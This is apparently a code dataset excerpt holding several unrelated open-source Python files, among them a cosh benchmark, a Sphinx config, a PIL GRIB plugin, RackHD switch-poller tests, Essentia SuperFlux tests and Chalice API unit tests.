| code (string, lengths 3–1.05M) | repo_name (string, lengths 5–104) | path (string, lengths 4–251) | language (1 class) | license (15 classes) | size (int64, 3–1.05M) |
|---|---|---|---|---|---|
#!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark cosh."""
from __future__ import print_function
import timeit
NAME = "cosh"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from math import cosh; from random import random;"
stmt = "y = cosh(10.0*random() - 5.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
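# For reference, running this script produces TAP-style output roughly like the
# following (timing numbers are illustrative, taken from the docstring example
# above, not from an actual run):
#
#   TAP version 13
#   # python::cosh
#     ---
#     iterations: 1000000
#     elapsed: 0.131009101868
#     rate: 7633057.5
#     ...
#   ok 1 benchmark finished
#   (repeated for each of the 3 repeats)
#   #
#   1..3
#   # total 3
#   # pass 3
#   #
#   # ok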
| stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/cosh/benchmark/python/benchmark.py | Python | apache-2.0 | 2,165 |
"""Send a picture Fling"""
import pyfling
f = pyfling.Fling("XXXXXXXX")
img_url = f.upload("test.jpg")
#img_url = "http://lorempixel.com/640/1138"
result = f.send_image(img_url)
print(result)
| davejm/pyfling | examples.sendimage.py | Python | mit | 194 |
# -*- coding: utf-8 -*-
#
# pytest-single_file_logging documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 1 00:43:18 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.ifconfig',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pytest-pytest-single_file_logging'
copyright = u'2015, Chris Saxey'
author = u'Chris Saxey'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pytest-cookiecutterplugin_namedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pytest-cookiecutterplugin_name.tex', u'pytest-\\{\\{cookiecutter.plugin\\_name\\}\\} Documentation',
u'\\{\\{cookiecutter.full\\_name\\}\\}', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pytest-cookiecutterplugin_name', u'pytest-pytest-single_file_logging Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pytest-cookiecutterplugin_name', u'pytest-pytest-single_file_logging Documentation',
author, 'pytest-cookiecutterplugin_name', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| darthghandi/pytest-single-file-logging | docs/conf.py | Python | apache-2.0 | 9,465 |
import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'BIOMD0000000028.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString)
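# A minimal follow-up sketch (assuming the libsbml import above succeeded):
# readSBMLFromString() returns an SBMLDocument, so the model itself would be
# inspected roughly like this:
#
#     model = sbml.getModel()
#     print(model.getId(), model.getNumSpecies(), model.getNumReactions())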
| biomodels/BIOMD0000000028 | BIOMD0000000028/model.py | Python | cc0-1.0 | 427 |
#
# The Python Imaging Library
# $Id$
#
# GRIB stub adapter
#
# Copyright (c) 1996-2003 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import Image, ImageFile
_handler = None
##
# Install application-specific GRIB image handler.
#
# @param handler Handler object.
def register_handler(handler):
global _handler
_handler = handler
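# A minimal handler sketch (hypothetical class, not part of PIL): the stub
# below expects an object exposing open() and save() methods, roughly:
#
#   class MyGribHandler:
#       def open(self, im):
#           # decode the GRIB data behind im.fp and set im.size / im.mode
#           pass
#       def save(self, im, fp, filename):
#           # encode `im` and write it as GRIB to the open file `fp`
#           pass
#
#   register_handler(MyGribHandler())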
# --------------------------------------------------------------------
# Image adapter
def _accept(prefix):
return prefix[0:4] == "GRIB" and prefix[7] == chr(1)
class GribStubImageFile(ImageFile.StubImageFile):
format = "GRIB"
format_description = "GRIB"
def _open(self):
offset = self.fp.tell()
if not _accept(self.fp.read(8)):
raise SyntaxError("Not a GRIB file")
self.fp.seek(offset)
# make something up
self.mode = "F"
self.size = 1, 1
loader = self._load()
if loader:
loader.open(self)
def _load(self):
return _handler
def _save(im, fp, filename):
if _handler is None or not hasattr(_handler, "save"):
raise IOError("GRIB save handler not installed")
_handler.save(im, fp, filename)
# --------------------------------------------------------------------
# Registry
Image.register_open(GribStubImageFile.format, GribStubImageFile, _accept)
Image.register_save(GribStubImageFile.format, _save)
Image.register_extension(GribStubImageFile.format, ".grib")
| robiame/AndroidGeodata | pil/GribStubImagePlugin.py | Python | mit | 1,558 |
'''
Copyright 2016, EMC, Inc.
Author(s):
FIT test script template
'''
import fit_path # NOQA: unused import
import sys
import subprocess
import pprint
import fit_common
import test_api_utils
# LOCAL
NODELIST = []
def get_switches():
# returns a list with valid node IDs that match ARGS_LIST.sku in 'Name' or 'Model' field
# and matches node BMC MAC address in ARGS_LIST.obmmac if specified
# Otherwise returns list of all IDs that are not 'Unknown' or 'Unmanaged'
nodelist = []
# check if user specified a single nodeid to run against
# user must know the nodeid and any check for a valid nodeid is skipped
nodeid = fit_common.fitargs()['nodeid']
if nodeid != 'None':
nodelist.append(nodeid)
else:
catalog = fit_common.rackhdapi('/api/1.1/nodes')
for nodeentry in catalog['json']:
if nodeentry['type'] == 'switch':
nodelist.append(nodeentry['id'])
return nodelist
NODELIST = get_switches()
def get_rackhd_nodetype(nodeid):
nodetype = ""
# get the node info
mondata = fit_common.rackhdapi("/api/1.1/nodes/" + nodeid)
if mondata['status'] != 200:
print "Incorrect HTTP return code on nodeid, expected 200, received: {}".format(mondata['status'])
else:
# get the sku id contained in the node
sku = mondata['json'].get("sku")
if sku:
skudata = fit_common.rackhdapi("/api/1.1/skus/" + sku)
if skudata['status'] != 200:
print "Incorrect HTTP return code on sku, expected 200, received: {}".format(skudata['status'])
else:
nodetype = mondata['json'].get("name")
else:
nodetype = mondata['json'].get("name")
print "nodeid {} did not return a valid sku in get_rackhd_nodetype".format(nodeid)
return nodetype
from nose.plugins.attrib import attr
@attr(all=True, regression=True, smoke=True)
@fit_common.unittest.skipIf(NODELIST == [],"No switches defined, skipping test.")
class rackhd11_switch_pollers(fit_common.unittest.TestCase):
def test_get_id_pollers(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display the poller data per node."
print "\t{0}".format(msg)
for node in NODELIST:
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
for item in mon_data['json']:
# check required fields
self.assertGreater(item['pollInterval'], 0, 'pollInterval field error')
for subitem in ['node', 'config', 'createdAt', 'id', 'name', 'config']:
self.assertIn(subitem, item, subitem + ' field error')
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poll_data = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id)
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
print fit_common.json.dumps(poll_data['json'], indent=4)
def test_verify_poller_headers(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Verify header data reported on the poller"
print "\t{0}".format(msg)
for node in NODELIST:
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
nodetype = get_rackhd_nodetype(node)
if fit_common.VERBOSITY >= 2:
print "\nNode: {} Type: {}".format(node, nodetype)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poller_data = test_api_utils.get_poller_data_by_id(poller_id)
if fit_common.VERBOSITY >= 3:
print "\nPoller: " + poller + " ID: " + str(poller_id)
print fit_common.json.dumps(poller_data, indent=4)
def test_verify_poller_data(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Check number of polls being kept for poller ID"
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
nodetype = get_rackhd_nodetype(node)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poller_data = test_api_utils.get_poller_data_by_id(poller_id)
poll_len = len(poller_data)
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
print "Number of polls for "+ str(poller_id) + ": " + str(len(poller_data))
self.assertLessEqual(poll_len, 10, 'Number of cached polls should not exceed 10')
def test_get_current_poller_data(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display most current data from poller"
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
nodetype = get_rackhd_nodetype(node)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
monurl = "/api/1.1/pollers/" + str(poller_id) + "/data/current"
mondata = fit_common.rackhdapi(url_cmd=monurl)
if fit_common.VERBOSITY >= 2:
print fit_common.json.dumps(mondata, indent=4)
def test_get_poller_status_timestamp(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display status and timestamp from current poll"
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
nodetype = get_rackhd_nodetype(node)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
monurl = "/api/1.1/pollers/" + str(poller_id) + "/data/current"
mondata = fit_common.rackhdapi(url_cmd=monurl)
print "Return status", mondata['status']
if mondata['status'] == 200:
if fit_common.VERBOSITY >= 2:
print "Timestamp:", mondata['json'][0]['timestamp']
print fit_common.json.dumps(mondata['json'][0], indent=4)
def test_verify_poller_error_counter(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Check for Poller Errors"
print "\t{0}".format(msg)
errorlist = []
for node in NODELIST:
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
for item in mon_data['json']:
# check required fields
self.assertGreater(item['pollInterval'], 0, 'pollInterval field error')
for subitem in ['node', 'config', 'createdAt', 'id', 'name', 'config', 'updatedAt']:
self.assertIn(subitem, item, subitem + ' field error')
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poll_data = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id)
poll_fails = poll_data['json'].get('failureCount', 0)
if poll_fails != 0:
errorlist.append("Node: {} Poller: {} {} reported {} failureCount".format(node,
poller,
poller_id,
poll_fails))
if errorlist != []:
print "{}".format(fit_common.json.dumps(errorlist, indent=4))
self.assertEqual(errorlist, [], "Error reported in Pollers")
else:
if fit_common.VERBOSITY >= 2:
print ("No Poller errors found")
def test_get_nodes_id_pollers(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display the poller updated-at per node."
print "\t{0}".format(msg)
node = 0
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
for item in mon_data['json']:
# check required fields
self.assertGreater(item['pollInterval'], 0, 'pollInterval field error')
for subitem in ['node', 'config', 'createdAt', 'id', 'name', 'config', 'updatedAt']:
self.assertIn(subitem, item, subitem + ' field error')
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poll_data = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id)
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
pprint.pprint("Created At: {}".format(poll_data['json']['createdAt']))
pprint.pprint("Updated At: {}".format(poll_data['json']['updatedAt']))
def test_check_poller_interval(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display the poller interval."
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code, expected 200, got {}".format(mon_data['status']))
poller_list = []
if fit_common.VERBOSITY >= 2:
print fit_common.json.dumps(mon_data['json'], indent=4)
for item in mon_data['json']:
poller_list.append(item['id'])
for poller_id in poller_list:
poller = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id )
self.assertIn(poller['status'], [200], "Incorrect HTTP return code")
pollerdata = poller['json']
# check required fields
self.assertGreater(pollerdata['pollInterval'], 0, 'pollInterval field error')
poller_interval = pollerdata['pollInterval']
pollertime = poller_interval / 1000
if fit_common.VERBOSITY >= 2:
print "pollerInterval", poller_interval
print pollerdata['config'].get('metric', "")
print pollerdata.get('nextScheduled', "")
print pollertime
pollcurrent = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id + "/data/current" )
self.assertIn(pollcurrent['status'], [200], "Incorrect HTTP return code")
if fit_common.VERBOSITY >= 2:
print pollcurrent
if __name__ == '__main__':
fit_common.unittest.main()
| tannoa2/RackHD | test/tests/switch/test_rackhd11_switch_pollers.py | Python | apache-2.0 | 12,932 |
#!/usr/bin/env python
# Copyright (C) 2006-2021 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
from essentia.standard import MonoLoader, SuperFluxExtractor
from numpy import *
class TestSuperFluxExtractor(TestCase):
def testInvalidParam(self):
# All the parameter ranges are theoretically from 0 to infinity,
# hence we use negative values for the invalid-parameter checks.
self.assertConfigureFails(SuperFluxExtractor(), { 'combine': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'frameSize': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'hopSize': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'ratioThreshold': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'sampleRate': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'threshold': -1})
def testRegressionDubstep(self):
audio = MonoLoader(filename=join(testdata.audio_dir, 'recorded', 'dubstep.wav'))()
# This test case uses the documented default parameters on the recording dubstep.wav
onsets = SuperFluxExtractor(combine=30,frameSize=2048,hopSize=256,ratioThreshold=16,
sampleRate=44100,threshold=0.5)(audio)
# This commented out code was used to obtain reference samples for storing in a file.
# save('superfluxdub', onsets)
# Reference samples are loaded as expected values
expected_superflux = load(join(filedir(), 'superflux/superfluxdub.npy'))
self.assertAlmostEqualVector(onsets, expected_superflux, 1e-5)
def testRegressionTechnoloop(self):
audio = MonoLoader(filename=join(testdata.audio_dir, 'recorded', 'techno_loop.wav'))()
# This test case uses peak parameters slightly different from the defaults on the recording techno_loop.wav
onsets = SuperFluxExtractor(combine=20,frameSize=2048,hopSize=256,ratioThreshold=8,
sampleRate=44100,threshold=0.25)(audio)
# This commented out code was used to obtain reference samples for storing in a file.
# save('superfluxtechno', onsets)
# Reference samples are loaded as expected values
expected_superflux = load(join(filedir(), 'superflux/superfluxtechno.npy'))
self.assertAlmostEqualVector(onsets, expected_superflux, 1e-5)
def _assertVectorWithinVector(self, found, expected, precision=1e-5):
for i in range(len(found)):
for j in range(1,len(expected)):
if found[i] <= expected[j] and found[i] >= expected[j-1]:
if fabs(found[i] - expected[j-1]) < fabs(expected[j] - found[i]):
self.assertAlmostEqual(found[i], expected[j-1], precision)
else:
self.assertAlmostEqual(found[i], expected[j], precision)
def testSilence(self):
# zeros should return no onsets (empty array)
self.assertEqualVector(SuperFluxExtractor()(zeros(44100)), [])
def testEmpty(self):
# empty input should return no onsets (empty array)
self.assertEqualVector(SuperFluxExtractor()([]), [])
def testImpulse(self):
# Given an impulse should return its position
sampleRate = 44100
frameSize = 2048
hopSize = 256
signal = zeros(sampleRate * 2)
# impulses at 0.5 s and 1.0 s
signal[22050] = 1.
signal[44100] = 1.
expected = [0.5, 1.]
result = SuperFluxExtractor(sampleRate=sampleRate, frameSize=frameSize,
hopSize=hopSize)(signal)
# SuperfluxPeaks has a parameter 'combine' which is a threshold that
# puts together consecutive peaks. This means that a peak will be
# detected as soon as it is seen by a frame. Thus, the frame size
# also influences the expected precision of the algorithm.
precision = (hopSize + frameSize) / sampleRate
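# e.g. (256 + 2048) / 44100 is roughly 0.052 s with the parameters above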
self.assertAlmostEqualVectorAbs(result, expected, precision)
suite = allTests(TestSuperFluxExtractor)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
| MTG/essentia | test/src/unittests/rhythm/test_superfluxextractor.py | Python | agpl-3.0 | 4,892 |
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
# This file is only used if you use `make publish` or
# explicitly specify it as your config file.
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import *
import datetime
CURYEAR = datetime.date.today().year
HOMEURL = 'http://huisaddison.com'
HOMENAME = 'huisaddison'
SITEURL = 'http://huisaddison.com/blog'
SITENAME = 'huisaddison/blog'
BLOGSOURCEURL = 'https://github.com/huisaddison/blog'
STATIC_PATHS = ['img']
RELATIVE_URLS = False
DELETE_OUTPUT_DIRECTORY = True
PLUGIN_PATHS = ['../pelican-plugins']
PLUGINS = [
'render_math',
'tipue_search',
]
THEMES = '../blog-theme'
DIRECT_TEMPLATES=((
'index',
'tags',
'categories',
'authors',
'archives',
'search',
))
# Following items are often useful when publishing
#DISQUS_SITENAME = ""
#GOOGLE_ANALYTICS = ""
| huisaddison/blog | publishconf.py | Python | gpl-3.0 | 911 |
import unittest
from kivy3 import Object3D
from tests.utils import Sandbox
class DummyObject:
pass
class Object3DTest(unittest.TestCase):
def setUp(self):
self.sandbox = Sandbox()
self.obj = Object3D()
def tearDown(self):
self.sandbox.restore()
def test_position(self):
obj = self.obj
obj.pos.x = 10
self.assertEqual(obj._position[0], 10)
obj.position.y = 8
self.assertEqual(obj._position[1], 8)
obj.pos.z = 3
self.assertEqual(obj._position[2], 3)
def test_add_objects(self):
obj = self.obj
self.sandbox.stub(obj, '_add_child')
obj.add(DummyObject(), DummyObject(), DummyObject())
self.assertEqual(obj._add_child.call_count, 3)
def test_add_child(self):
obj = self.obj
child = DummyObject()
obj._add_child(child)
self.assertEqual(child.parent, obj)
self.assertEqual(len(obj.children), 1)
if __name__ == "__main__":
unittest.main()
| nskrypnik/kivy3 | tests/core/test_object3d.py | Python | mit | 1,024 |
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Unit tests for the app.py functions. These tests use the chalice.test.Client
class provided by AWS Chalice to simplify route testing.
"""
import json
from unittest.mock import MagicMock
import pytest
from chalice.app import RequestTimeoutError
from chalice.test import Client
import app
from chalicelib.library_data import DataServiceNotReadyException
@pytest.fixture
def mock_storage(monkeypatch):
_storage = MagicMock(
get_books=MagicMock(return_value=['book1', 'book2']),
add_book=MagicMock(return_value=('author1', 'book1')),
get_authors=MagicMock(return_value=['author1', 'author2']),
get_patrons=MagicMock(return_value=['patron1', 'patron2']),
add_patron=MagicMock(return_value='patron1'),
delete_patron=MagicMock(return_value='delete_patron'),
get_borrowed_books=MagicMock(return_value=['book1', 'book2']),
borrow_book=MagicMock(return_value='borrow_book'),
return_book=MagicMock(return_value='return_book')
)
monkeypatch.setattr(app, 'get_storage', lambda: _storage)
return _storage
def test_index():
with Client(app.app) as client:
response = client.http.get('/')
assert response.json_body == {
'description': 'A simple lending library REST API that runs entirely on '
'serverless components.'}
def test_list_books(mock_storage):
with Client(app.app) as client:
response = client.http.get('/books')
mock_storage.get_books.assert_called_with()
assert response.json_body == {'books': ['book1', 'book2']}
def test_list_books_timeout(mock_storage):
mock_storage.get_books = MagicMock(
side_effect=DataServiceNotReadyException('Timeout test'))
with Client(app.app) as client:
response = client.http.get('/books')
assert response.status_code == 408
def test_add_book(mock_storage):
with Client(app.app) as client:
test_book = {'Books.Title': 'test-book'}
response = client.http.post(
'/books', headers={'content-type': 'application/json'},
body=json.dumps(test_book))
mock_storage.add_book.assert_called_with(test_book)
assert response.json_body == {
'Authors.AuthorID': 'author1', 'Books.BookID': 'book1'}
def test_list_books_by_author(mock_storage):
with Client(app.app) as client:
author_id = 15
response = client.http.get(f'/books/{author_id}')
mock_storage.get_books.assert_called_with(author_id=author_id)
assert response.json_body == {'books': ['book1', 'book2']}
def test_list_authors(mock_storage):
with Client(app.app) as client:
response = client.http.get('/authors')
mock_storage.get_authors.assert_called_with()
assert response.json_body == {'authors': ['author1', 'author2']}
def test_list_patrons(mock_storage):
with Client(app.app) as client:
response = client.http.get('/patrons')
mock_storage.get_patrons.assert_called_with()
assert response.json_body == {'patrons': ['patron1', 'patron2']}
def test_add_patron(mock_storage):
with Client(app.app) as client:
patron = {'Patrons.FirstName': 'Pierre'}
response = client.http.post(
'/patrons', headers={'content-type': 'application/json'},
body=json.dumps(patron))
mock_storage.add_patron.assert_called_with(patron)
assert response.json_body == {'Patrons.PatronID': 'patron1'}
def test_delete_patron(mock_storage):
with Client(app.app) as client:
patron_id = 55
client.http.delete(f'/patrons/{patron_id}')
mock_storage.delete_patron.assert_called_with(patron_id)
def test_list_borrowed_books(mock_storage):
with Client(app.app) as client:
response = client.http.get('/lending')
mock_storage.get_borrowed_books.assert_called_with()
assert response.json_body == {'books': ['book1', 'book2']}
def test_borrow_book(mock_storage):
with Client(app.app) as client:
book_id = 5
patron_id = 13
client.http.put(f'/lending/{book_id}/{patron_id}')
mock_storage.borrow_book(book_id, patron_id)
def test_return_book(mock_storage):
with Client(app.app) as client:
book_id = 5
patron_id = 13
client.http.delete(f'/lending/{book_id}/{patron_id}')
mock_storage.return_book(book_id, patron_id)
